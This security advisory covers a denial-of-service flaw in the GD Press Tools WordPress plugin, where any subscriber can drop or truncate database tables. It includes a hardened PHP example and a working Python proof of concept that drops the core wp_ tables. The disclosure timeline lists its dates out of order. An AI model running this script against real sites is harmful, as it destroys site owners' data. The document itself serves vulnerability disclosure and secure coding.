GD Press Tools [DoS]

GD Press Tools plugin for WordPress suffers from a Denial of Service vulnerability.

Description

The plugin hooks a function to the admin_init WordPress action, which in turn executes the method gdPTAdmin::init_operations(). This method doesn't check user rights before executing a list of predefined actions. One of those actions is the deletion of database tables.

Any registered user can execute this action in order to delete or truncate database tables; no specific privileges are required for the attacker. This can take the entire website down, therefore this is considered a Denial of Service vulnerability.
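The root cause described above is a state-changing handler on admin_init that trusts a request parameter and never checks who is asking. admin_init fires for every logged-in user on every wp-admin page load, so a subscriber account reaches it just as an administrator does. The following is an added illustration, not code from GD Press Tools or from WordPress core, of the unsafe shape next to the hardened one; the function names, the `example_action` and `name` parameters, the capability, the nonce action and the allowlisted table name are all assumptions chosen for the example.

```php
<?php
/**
 * Added example (not GD Press Tools code): gating a destructive
 * maintenance action registered on admin_init. All identifiers prefixed
 * example_ are assumptions for illustration.
 */

// Unsafe shape, as the advisory describes: shown for contrast only and
// deliberately NOT registered with add_action(). Any logged-in user who
// loads a wp-admin page with the right query string reaches the query.
function example_unsafe_init() {
    if ( isset( $_GET['example_action'] ) && 'empty_table' === $_GET['example_action'] ) {
        example_empty_table( sanitize_key( wp_unslash( $_GET['name'] ) ) ); // no capability or nonce check
    }
}

// Hardened shape: authorization, anti-CSRF nonce, and an allowlist so the
// parameter cannot name an arbitrary table.
add_action( 'admin_init', 'example_safe_init' );
function example_safe_init() {
    if ( ! isset( $_GET['example_action'] ) || 'empty_table' !== $_GET['example_action'] ) {
        return;
    }
    // 1. Authorization: only users with manage_options (administrators) may proceed.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to perform this action.' ), '', array( 'response' => 403 ) );
    }
    // 2. Anti-CSRF: the link must carry a valid nonce for this specific action
    //    (check_admin_referer reads the _wpnonce parameter that wp_nonce_url adds).
    check_admin_referer( 'example_empty_table' );
    // 3. Input validation: accept only the tables this plugin owns, never core tables.
    global $wpdb;
    $allowed = array( $wpdb->prefix . 'example_plugin_cache' );
    $name    = sanitize_key( wp_unslash( $_GET['name'] ) );
    if ( ! in_array( $name, $allowed, true ) ) {
        wp_die( esc_html__( 'Unknown table.' ), '', array( 'response' => 400 ) );
    }
    example_empty_table( $name );
}

// The query itself. In the hardened path $name has already been allowlisted,
// so no attacker-controlled value reaches the identifier position.
function example_empty_table( $name ) {
    global $wpdb;
    $wpdb->query( 'TRUNCATE TABLE `' . esc_sql( $name ) . '`' );
}

// Where the admin UI renders the maintenance link, the nonce is attached
// like this; a link built without it fails check_admin_referer() above.
function example_action_link( $name ) {
    return wp_nonce_url(
        add_query_arg(
            array( 'example_action' => 'empty_table', 'name' => $name ),
            admin_url( 'index.php' )
        ),
        'example_empty_table'
    );
}
```

The capability check is the fix for the issue in this advisory; the nonce and the allowlist close the two neighbouring problems that the same pattern usually carries (an administrator being tricked into clicking the link, and the parameter selecting a core table). When reviewing a plugin, any admin_init or init callback that reads `$_GET`/`$_POST` and then writes to the database or filesystem should show all three checks before the write.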

PoC

The following script will delete most core tables from the database. We assume that the table prefix is wp_, a common scenario as this is the default prefix.

#!/usr/bin/python3

################################################################################
# GD Press Tools - Denial of Service
#
# !!! WARNING !!! Don't use this on a production site; if successful it will
# delete most of your site's content and leave it in an unusable state.
#
# Author: Pan Vag <[email protected]>
################################################################################

import sys

import requests

baseUrl = 'http://example.com'
loginUrl = baseUrl + '/wp-login.php'
adminUrl = baseUrl + '/wp-admin/index.php'

# Credentials of an ordinary subscriber account; no elevated role is needed.
loginPostData = {
    'log': 'subscriber',
    'pwd': 'password',
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}

s = requests.Session()

r = s.post(loginUrl, loginPostData)
if r.status_code != 200:
    print('Login error')
    sys.exit(1)

tables = [
    'wp_postmeta',
    'wp_commentmeta',
    'wp_termmeta',
    'wp_term_relationships',
    'wp_term_taxonomy',
    'wp_comments',
    'wp_links',
    'wp_terms',
    'wp_posts',
    'wp_options',
]

for name in tables:
    print('Attempting to drop table ' + name)
    # The `gda` parameter selects the predefined action run by
    # gdPTAdmin::init_operations() on admin_init. `tpldrp` drops the table;
    # the alternative action `tblemp` uses TRUNCATE to empty it instead.
    r = s.get(adminUrl, params={
        'gda': 'tpldrp',
        'name': name
    })
    if r.status_code != 200:
        print('Attempt to drop table ' + name + ' failed')

sys.exit(0)

Solution

As of 2016-02-18 the vendor stated that this plugin is discontinued and won't resolve this issue. The only available solution is to remove this plugin.

Timeline

  • 2016-02-17:
    Vendor notified through wordpress.org support forums
  • 2016-02-18:
    Vendor notified through contact form in his website
  • 2016-02-17:
    Author responded won't fix
  • 2016-02-18:
    Notified security at wordpress.org and plugins at wordpress.org
  • 2016-02-23:
    Plugin was taken down by wordpress.org plugins team